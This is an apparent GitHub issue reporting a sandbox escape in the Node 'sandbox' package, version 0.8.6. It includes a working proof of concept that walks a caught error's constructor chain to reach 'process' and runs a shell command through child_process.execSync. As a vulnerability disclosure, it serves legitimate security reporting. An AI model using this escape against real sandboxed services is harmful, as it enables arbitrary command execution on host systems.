sandbox icon indicating copy to clipboard operation
sandbox copied to clipboard
verified publisher icon gf3

Sandbox Escape Bug

Open seongil-wi opened this issue 2 years ago • 0 comments

  • Sandbox version: 0.8.6
  • Node version: 18.15.0
var Sandbox = require("sandbox")
var code = `
    try{ 
        toLocaleString()
     } catch(pp){
        pp.constructor.constructor('return process')().mainModule.require('child_process').execSync('touch flag');
    }
`

s = new Sandbox()
s.run(code)

We found a sandbox escaping bug. This bug can be triggered by calling toLocaleString() function. Also, we can execute arbitrary shell code using the process module.

seongil-wi avatar Mar 30 '23 07:03 seongil-wi